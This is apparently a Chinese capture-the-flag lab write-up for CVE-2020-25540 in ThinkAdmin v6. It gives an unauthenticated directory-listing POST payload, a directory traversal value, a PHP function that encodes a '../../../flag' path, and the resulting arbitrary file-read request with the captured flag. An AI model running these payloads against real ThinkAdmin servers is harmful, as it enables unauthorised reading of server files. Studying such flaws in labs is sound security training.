春秋云镜 CVE-2020-25540

isbug02023-08-07 18:27

春秋云镜 CVE-2020-25540 Thinkadmin v6任意文件读取漏洞

靶标介绍

ThinkAdmin 6版本存在路径查找漏洞,可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。

启动场景

漏洞利用

1、未授权列目录poc

读取网站根目录Payload: http://think.admin/ThinkAdmin/public/admin.html?s=admin/api.Update/node

POST:

rules="/"

rules=".../.../.../" (目录穿越)

2、任意文件读取

使用加密函数对文件名进行加密

php 复制代码 
<?php
function encode($content)
{
    [$chars, $length] = ['', strlen($string = iconv('UTF-8', 'GBK//TRANSLIT', $content))];
    for ($i = 0; $i < $length; $i++) $chars .= str_pad(base_convert(ord($string[$i]), 10, 36), 2, 0, 0);
    return $chars;
}
$content="../../../flag";
echo encode($content);
?>

加密后的文件名为1a1a1b1a1a1b1a1a1b2u302p2v

请求http://eci-2ze3dysieeo26l90ip96.cloudeci1.ichunqiu.com/admin.html?s=admin/api.Update/get/encode/1a1a1b1a1a1b1a1a1b2u302p2v

base64解密得到文件内容

得到flag

flag{cef71ab7-c930-408d-8074-52350766063b}

相关推荐
aodunsoft13 小时前
安全月报 | 傲盾DDoS攻击防御2026年5月简报
网络·安全·ddos
IT策士13 小时前
第33篇 k8s 之 敏感信息管理:Secret 与安全实践
安全·容器·kubernetes
小熊officer13 小时前
网络渗透和网络安全
网络·安全·web安全
黎阳之光13 小时前
虚实同源·数智治水:黎阳之光视频孪生,重构智慧水务新范式
运维·物联网·算法·安全·数字孪生
世界尽头与你13 小时前
Spring Boot Watcher 未授权访问漏洞
spring boot·安全·网络安全·渗透测试
大势智慧13 小时前
矿影安巡版|无人机自主巡检,AI识别隐患,筑牢矿山安全防线
人工智能·安全·无人机·升级·智慧矿山·空间智能·露天矿山
阿昭L15 小时前
Lab 3-1
windows·安全·逆向工程·恶意代码分析
上海云盾第一敬业销售16 小时前
服务器遭受攻击的应对策略及快速防护实践
运维·服务器·web安全·ddos
Apifox1 天前
Apifox 5 月更新|Postman 导入优化、Runner 支持非 root 运行、请求代码自动带鉴权
前端·后端·安全
清溪5491 天前
n8n表达式沙箱逃逸至RCE漏洞-CVE-2025-68613复现
javascript·安全
热门推荐
01GitHub 镜像站点022026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf03Codex 下载安装指南:Windows 和 macOS 官方版下载04【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法05【AI】2026 年具身智能模型和世界模型总结06裂开!ChatGPT 居然开始要手机号验证,附详细解决方法07CC-Switch & Claude 基于 Linux 服务器安装使用指南08CC-Switch 下载、安装与使用配置指南【2026.5.29】09Codex 接入 DeepSeek API 完整配置文档10几个好用的ip纯净度检测网站